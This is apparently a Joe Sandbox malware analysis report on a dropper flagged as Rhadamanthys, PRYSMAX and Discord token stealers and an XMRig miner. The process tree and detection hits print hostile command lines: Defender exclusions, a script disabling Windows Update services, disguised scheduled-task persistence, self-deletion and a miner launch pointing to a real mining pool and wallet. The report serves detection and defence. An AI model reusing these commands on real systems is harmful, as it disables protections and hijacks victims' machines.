Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Arly.exe

Overview

General Information

Sample name:Arly.exe
Analysis ID:1635427
MD5:2c8bc183a584e14835224b36eacee303
SHA1:b93c1d9a5414d55afec816643c2a11d69d3d14e3
SHA256:9ad4840925f3ede100b95e05543747704bcbcadef46f5abcd8eb5450ba1d2ca6
Tags:exeuser-aachum
Infos:

Detection

Discord Token Stealer, PRYSMAX STEALER, RHADAMANTHYS, Xmrig
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Schedule system process
Sigma detected: Xmrig
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected Discord Token Stealer
Yara detected PRYSMAX STEALER
Yara detected RHADAMANTHYS Stealer
Yara detected Xmrig cryptocurrency miner
Adds a directory exclusion to Windows Defender
Changes security center settings (notifications, updates, antivirus, firewall)
DNS related to crypt mining pools
Found direct / indirect Syscall (likely to bypass EDR)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
PE file contains section with special chars
Queries memory information (via WMI often done to detect virtual machines)
Queries temperature or sensor information (via WMI often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: Potential Crypto Mining Activity
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspicious Windows Service Tampering
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w10x64
  • Arly.exe (PID: 7688 cmdline: "C:\Users\user\Desktop\Arly.exe" MD5: 2C8BC183A584E14835224B36EACEE303)
    • cmd.exe (PID: 6864 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7188 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7352 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
    • cmd.exe (PID: 7360 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7372 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7448 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 3032 cmdline: C:\Windows\system32\cmd.exe /d /s /c "net session" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1624 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • net.exe (PID: 1860 cmdline: net session MD5: 31890A7DE89936F922D44D677F681A7F)
        • net1.exe (PID: 7528 cmdline: C:\Windows\system32\net1 session MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
    • cmd.exe (PID: 1752 cmdline: C:\Windows\system32\cmd.exe /d /s /c "taskkill /F /IM SecHealthUI.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 4812 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 3028 cmdline: taskkill /F /IM SecHealthUI.exe MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
    • cmd.exe (PID: 1372 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 1424 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7868 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • cmd.exe (PID: 7376 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7416 cmdline: powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • wxrctnzmvurnezy.exe (PID: 1212 cmdline: C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exe MD5: B0FFB214CCBE4160B45A0AC02DAE28A7)
      • tasklist.exe (PID: 5552 cmdline: "tasklist" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • conhost.exe (PID: 64 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 5452 cmdline: "tasklist" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • conhost.exe (PID: 3172 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • vwytuyiwrmnucib.exe (PID: 5868 cmdline: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe MD5: D72B6A0764E5D144F92DCCC3E4B23DFE)
      • svchost.exe (PID: 3216 cmdline: "C:\Windows\System32\svchost.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
        • fontdrvhost.exe (PID: 2132 cmdline: "C:\Windows\System32\fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
          • WerFault.exe (PID: 5780 cmdline: C:\Windows\system32\WerFault.exe -u -p 2132 -s 136 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
    • bctuwcvcqvnxbyc.exe (PID: 5692 cmdline: C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe MD5: D4F8BDE0CCC08F89BC28A2A8EF1C297E)
      • tasklist.exe (PID: 3004 cmdline: "tasklist" MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
        • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 2544 cmdline: "powershell" -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 5176 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 2016 cmdline: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • schtasks.exe (PID: 4000 cmdline: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe" MD5: 76CD6626DD8834BD4A42E6A565104DC2)
      • cmd.exe (PID: 3044 cmdline: "cmd.exe" /C timeout 5 && del "C:\Users\user\AppData\Local\Temp\bctuwcvcqvnxbyc.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 4212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 4032 cmdline: timeout 5 MD5: 100065E21CFBBDE57CBA2838921F84D6)
    • uqqqtttivubuibr.exe (PID: 5612 cmdline: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe MD5: E1A85DD83A97481B2AA1009971969CCA)
      • powershell.exe (PID: 3460 cmdline: powershell -Command "Get-WmiObject Win32_PortConnector" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1200 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • schtasks.exe (PID: 5016 cmdline: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)
        • conhost.exe (PID: 5032 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 5024 cmdline: cmd.exe /c timeout /t 5 /nobreak >nul & del "C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5048 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 4984 cmdline: timeout /t 5 /nobreak MD5: 100065E21CFBBDE57CBA2838921F84D6)
  • svchost.exe (PID: 7696 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7720 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • SgrmBroker.exe (PID: 7780 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: 3BA1A18A0DC30A0545E7765CB97D8E63)
  • sppsvc.exe (PID: 7888 cmdline: C:\Windows\system32\sppsvc.exe MD5: 320823F03672CEB82CC3A169989ABD12)
  • svchost.exe (PID: 7952 cmdline: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 7996 cmdline: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • MpCmdRun.exe (PID: 7488 cmdline: "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable MD5: B3676839B2EE96983F9ED735CD044159)
      • conhost.exe (PID: 7716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • MicrosoftEdgeUpdate.exe (PID: 5388 cmdline: C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe MD5: D4F8BDE0CCC08F89BC28A2A8EF1C297E)
  • powershell.exe (PID: 4936 cmdline: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 4928 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • svchost.exe (PID: 6772 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 2552 cmdline: C:\Windows\system32\WerFault.exe -pss -s 480 -p 2132 -ip 2132 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 8 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • RtkAudUService64a.exe (PID: 3028 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2 MD5: 037F02C0AB286C14EB4EEFF4078F8D34)
    • conhost.exe (PID: 7300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RhadamanthysAccording to PCrisk, Rhadamanthys is a stealer-type malware, and as its name implies - it is designed to extract data from infected machines.At the time of writing, this malware is spread through malicious websites mirroring those of genuine software such as AnyDesk, Zoom, Notepad++, and others. Rhadamanthys is downloaded alongside the real program, thus diminishing immediate user suspicion. These sites were promoted through Google ads, which superseded the legitimate search results on the Google search engine.
  • Sandworm
https://malpedia.caad.fkie.fraunhofer.de/details/win.rhadamanthys
NameDescriptionAttributionBlogpost URLsLink
xmrigAccording to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling".In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
    dump.pcapMacOS_Cryptominer_Xmrig_241780a1unknownunknown
    • 0x1244e0b:$a1: mining.set_target
    • 0x123ece8:$a2: XMRIG_HOSTNAME
    • 0x124131e:$a3: Usage: xmrig [OPTIONS]
    • 0x123ecc0:$a4: XMRIG_VERSION
    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
      C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJoeSecurity_PRYSMAXSTEALERYara detected PRYSMAX STEALERJoe Security
        C:\Users\user\AppData\Local\Temp\wxrctnzmvurnezy.exeJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          SourceRuleDescriptionAuthorStrings
          00000043.00000002.2542723045.000002810FAAC000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
            0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_DiscordTokenStealerYara detected Discord Token StealerJoe Security
              0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_PRYSMAXSTEALERYara detected PRYSMAX STEALERJoe Security
                0000001C.00000002.1566695369.00007FF7AFC31000.00000002.00000001.01000000.00000005.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  00000021.00000003.1922191310.0000000000970000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_RHADAMANTHYSYara detected RHADAMANTHYS StealerJoe Security
                    Click to see the 15 entries
                    SourceRuleDescriptionAuthorStrings
                    61.3.svchost.exe.5060000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      33.3.vwytuyiwrmnucib.exe.2d70000.6.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                        33.3.vwytuyiwrmnucib.exe.2f90000.7.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                          61.3.svchost.exe.4e40000.6.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                            61.3.svchost.exe.4e40000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                              Click to see the 11 entries

                              Bitcoin Miner

                              barindex
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 3028, ProcessName: RtkAudUService64a.exe

                              System Summary

                              barindex
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ProcessId: 5612, TargetFilename: C:\ProgramData\WinUpdate32\RuntimeBroker.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4952, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\RtkAudUService64a.exe" -a rx/0 -o xmr-eu1.nanopool.org:10343 -u 44kk8GDevYWaamLGkAxwMybbvB6k4TkDqPayXugZhwdLRL5P5mWbsaQi197NuLmJLqU1H78DvymgoA8FZTx4rPDH7Z4YL56.RIG4 -p RIG4 --cpu-priority=0 --tls --threads=2, ProcessId: 3028, ProcessName: RtkAudUService64a.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Arly.exe", ParentImage: C:\Users\user\Desktop\Arly.exe, ParentProcessId: 7688, ParentProcessName: Arly.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 1372, ProcessName: cmd.exe
                              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems), frack113: Data: Command: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", CommandLine|base64offset|contains: *&, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentImage: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentProcessId: 5612, ParentProcessName: uqqqtttivubuibr.exe, ProcessCommandLine: powershell.exe -Command "$services = @(\"wuauserv\",\"UsoSvc\",\"bits\",\"dosvc\",\"waasmedicSvc\"); foreach ($svc in $services) { Stop-Service $svc -ErrorAction SilentlyContinue -Force; Set-Service $svc -StartupType Disabled -ErrorAction SilentlyContinue; }", ProcessId: 1200, ProcessName: powershell.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\Arly.exe", ParentImage: C:\Users\user\Desktop\Arly.exe, ParentProcessId: 7688, ParentProcessName: Arly.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Add-MpPreference -ExclusionPath 'C:\Users\user\AppData'"", ProcessId: 1372, ProcessName: cmd.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, CommandLine|base64offset|contains: *j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentImage: C:\Users\user\AppData\Local\Microsoft\uqqqtttivubuibr.exe, ParentProcessId: 5612, ParentProcessName: uqqqtttivubuibr.exe, ProcessCommandLine: schtasks.exe /Create /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineCoreTask" /TR "C:\ProgramData\WinUpdate32\RuntimeBroker.exe" /RL HIGHEST /F, ProcessId: 5016, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", CommandLine|base64offset|contains: mj,, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "cmd.exe" /C schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2016, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks /Create /F /SC MINUTE /MO 1 /TN "MicrosoftEdgeUpdateTaskMachineUACC" /TR "C:\Users\user\AppData\Roaming\EdgeUpdater\MicrosoftEdgeUpdate.exe", ProcessId: 4000, ProcessName: schtasks.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe, ParentImage: C:\Users\user\AppData\Local\Temp\vwytuyiwrmnucib.exe, ParentProcessId: 5868, ParentProcessName: vwytuyiwrmnucib.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 3216, ProcessName: svchost.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", CommandLine|base64offset|contains: ^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "Get-WmiObject Win32_PortConnector"", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7360, ParentProcessName: cmd.exe, ProcessCommandLine: powershell -Command "Get-WmiObject Win32_PortConnector", ProcessId: 7448, ProcessName: powershell.exe
